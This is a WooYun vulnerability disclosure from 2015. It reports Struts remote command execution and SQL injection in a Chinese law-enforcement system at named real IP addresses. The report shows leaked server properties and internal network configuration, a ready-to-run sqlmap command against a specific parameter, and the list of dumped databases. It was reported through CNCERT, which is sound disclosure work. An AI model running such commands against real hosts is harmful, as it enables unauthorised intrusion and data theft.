当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089846

漏洞标题:某执法系统远程命令执行+注入直捣内网

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-01-05 11:39

修复时间:2015-02-19 11:40

公开时间:2015-02-19 11:40

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-05: 细节已通知厂商并且等待厂商处理中
2015-01-09: 厂商已经确认,细节仅向厂商公开
2015-01-19: 细节向核心白帽子及相关领域专家公开
2015-01-29: 细节向普通白帽子公开
2015-02-08: 细节向实习白帽子公开
2015-02-19: 细节向公众公开

简要描述:

误打误撞,点到为止,谢绝水表

详细说明:

该系统地址(两个ip):
http://210.14.147.144:8080/login.action
http://210.14.147.145:8080/login.action

1.png


1.登录处struts命令执行

网站物理路径: D:\Tomcat\webapps\YHPC
java.home: C:\Program Files\Java\jdk1.6.0_38\jre
java.version: 1.6.0_38
os.name: Windows Server 2008 R2
os.arch: amd64
os.version: 6.1
user.name: Administrator
user.home: C:\Users\Administrator
user.dir: D:\Tomcat\bin
java.class.version: 50.0
java.class.path: D:\Tomcat\bin\bootstrap.jar
java.library.path: C:\Program Files\Java\jdk1.6.0_38\bin;C:\Windows\Sun\Java\bin;C:\Windows\system32;C:\Windows;D:\OraHome_1\bin;D:\OraHome_1\Mobile\Server\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Java\jdk1.6.0_38\bin;C:\Program Files (x86)\WebDataMiner Operation;D:\mobileclient\bin;D:\OraHome_1\bin;D:\OraHome_1\Mobile\Server\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Java\jdk1.6.0_38\bin;C:\Program Files (x86)\WebDataMiner Operation;.
file.separator: \
path.separator: ;
java.vendor: Sun Microsystems Inc.
java.vendor.url: http://java.sun.com/
java.vm.specification.version: 1.0
java.vm.specification.vendor: Sun Microsystems Inc.
java.vm.specification.name: Java Virtual Machine Specification
java.vm.version: 20.13-b02
java.vm.vendor: Sun Microsystems Inc.
java.vm.name: Java HotSpot(TM) 64-Bit Server VM
java.specification.version: 1.6
java.specification.vender: 
java.specification.name: Java Platform API Specification
java.io.tmpdir: D:\Tomcat\temp
hibernate信息


网络配置:

Windows IP ??
   ???  . . . . . . . . . . . . . : WIN-MAAI1POO1TP
   ? DNS ?? . . . . . . . . . . . : 
   ????  . . . . . . . . . . . . : ??
   IP ????? . . . . . . . . . . : ?
   WINS ????? . . . . . . . . . : ?
?????? ???? 5:
   ????? DNS ?? . . . . . . . : 
   ??. . . . . . . . . . . . . . . : Intel(R) I350 Gigabit Network Connection #4
   ????. . . . . . . . . . . . . : 6C-AE-8B-4F-80-FB
   DHCP ??? . . . . . . . . . . . : ?
   ???????. . . . . . . . . . : ?
   ???? IPv6 ??. . . . . . . . : fe80::ad2d:48b4:2152:b8c8%17(??) 
   IPv4 ?? . . . . . . . . . . . . : 192.168.1.117(??) 
   ????  . . . . . . . . . . . . : 255.255.255.0
   ????. . . . . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 476884619
   DHCPv6 ??? DUID  . . . . . . . : 00-01-00-01-18-F2-EA-C0-6E-AE-8B-4F-80-F9
   DNS ???  . . . . . . . . . . . : 202.106.0.20
   TCPIP ?? NetBIOS  . . . . . . . : ???
?????? ???? 4:
   ????? DNS ?? . . . . . . . : 
   ??. . . . . . . . . . . . . . . : Intel(R) I350 Gigabit Network Connection #3
   ????. . . . . . . . . . . . . : 6C-AE-8B-4F-80-FA
   DHCP ??? . . . . . . . . . . . : ?
   ???????. . . . . . . . . . : ?
   ???? IPv6 ??. . . . . . . . : fe80::dd4c:db30:15d3:708e%16(??) 
   IPv4 ?? . . . . . . . . . . . . : 210.14.147.144(??) 
   ????  . . . . . . . . . . . . : 255.255.255.224
   ????. . . . . . . . . . . . . : 210.14.147.129
   DHCPv6 IAID . . . . . . . . . . . : 426552971
   DHCPv6 ??? DUID  . . . . . . . : 00-01-00-01-18-F2-EA-C0-6E-AE-8B-4F-80-F9
   DNS ???  . . . . . . . . . . . : 202.106.0.20
   TCPIP ?? NetBIOS  . . . . . . . : ???
?????? ???? 3:
   ????  . . . . . . . . . . . . : ?????
   ????? DNS ?? . . . . . . . : 
   ??. . . . . . . . . . . . . . . : Intel(R) I350 Gigabit Network Connection #2
   ????. . . . . . . . . . . . . : 6C-AE-8B-4F-80-FD
   DHCP ??? . . . . . . . . . . . : ?
   ???????. . . . . . . . . . : ?
?????? ???? 2:
   ????  . . . . . . . . . . . . : ?????
   ????? DNS ?? . . . . . . . : 
   ??. . . . . . . . . . . . . . . : Intel(R) I350 Gigabit Network Connection
   ????. . . . . . . . . . . . . : 6C-AE-8B-4F-80-FC
   DHCP ??? . . . . . . . . . . . : ?
   ???????. . . . . . . . . . : ?
?????? ????:
   ????? DNS ?? . . . . . . . : 
   ??. . . . . . . . . . . . . . . : IBM USB ?? NDIS ????
   ????. . . . . . . . . . . . . : 6E-AE-8B-4F-80-F9
   DHCP ??? . . . . . . . . . . . : ?
   ???????. . . . . . . . . . : ?
   ???? IPv6 ??. . . . . . . . : fe80::a18b:cd60:f5d8:ddcf%11(??) 
   IPv4 ?? . . . . . . . . . . . . : 169.254.95.120(??) 
   ????  . . . . . . . . . . . . : 255.255.255.0
   ???????  . . . . . . . . . : 2014?12?23? 8:56:07
   ???????  . . . . . . . . . : 2015?1?3? 21:51:36
   ????. . . . . . . . . . . . . : 
   DHCP ??? . . . . . . . . . . . : 169.254.95.118
   DHCPv6 IAID . . . . . . . . . . . : 242134667
   DHCPv6 ??? DUID  . . . . . . . : 00-01-00-01-18-F2-EA-C0-6E-AE-8B-4F-80-F9
   DNS ???  . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   TCPIP ?? NetBIOS  . . . . . . . : ???
????? isatap.{0B1FCBBC-DF5D-4112-8368-498919848BEE}:
   ????  . . . . . . . . . . . . : ?????
   ????? DNS ?? . . . . . . . : 
   ??. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
   ????. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP ??? . . . . . . . . . . . : ?
   ???????. . . . . . . . . . : ?
????? isatap.{DF5F293E-246A-4A77-83C2-040B69E08FCA}:
   ????  . . . . . . . . . . . . : ?????
   ????? DNS ?? . . . . . . . : 
   ??. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   ????. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP ??? . . . . . . . . . . . : ?
   ???????. . . . . . . . . . : ?
????? isatap.{F719587D-2A0E-4D67-8E3E-FFF1B5B4A3FA}:
   ????  . . . . . . . . . . . . : ?????
   ????? DNS ?? . . . . . . . : 
   ??. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3
   ????. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP ??? . . . . . . . . . . . : ?
   ???????. . . . . . . . . . : ?
????? isatap.{A974C4EA-4044-48AD-9446-9252AD113C6F}:
   ????  . . . . . . . . . . . . : ?????
   ????? DNS ?? . . . . . . . : 
   ??. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #4
   ????. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP ??? . . . . . . . . . . . : ?
   ???????. . . . . . . . . . : ?
????? isatap.{6CF6F8D8-A193-4940-AA26-B3049316C85E}:
   ????  . . . . . . . . . . . . : ?????
   ????? DNS ?? . . . . . . . : 
   ??. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #5
   ????. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP ??? . . . . . . . . . . . : ?
   ???????. . . . . . . . . . : ?
????? 6TO4 Adapter:
   ????? DNS ?? . . . . . . . : 
   ??. . . . . . . . . . . . . . . : Microsoft 6to4 Adapter
   ????. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP ??? . . . . . . . . . . . : ?
   ???????. . . . . . . . . . : ?
   IPv6 ?? . . . . . . . . . . . . : 2002:d20e:9390::d20e:9390(??) 
   ????. . . . . . . . . . . . . : 2002:c058:6301::c058:6301
   DNS ???  . . . . . . . . . . . : 202.106.0.20
   TCPIP ?? NetBIOS  . . . . . . . : ???


2.注入

c:\Python27>python.exe sqlmap\sqlmap.py -u http://210.14.147.144:8080/mVersion/loadDownloadPage?description=p*&random=0.9249100554734468&way=ajax" --dbs --threads=10


只列举数据库:

available databases [21]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DANGER
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] MOBILEADMIN
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WEIHUA
[*] WMSYS
[*] XDB

漏洞证明:

如上

修复方案:

你们懂

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-09 18:08

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无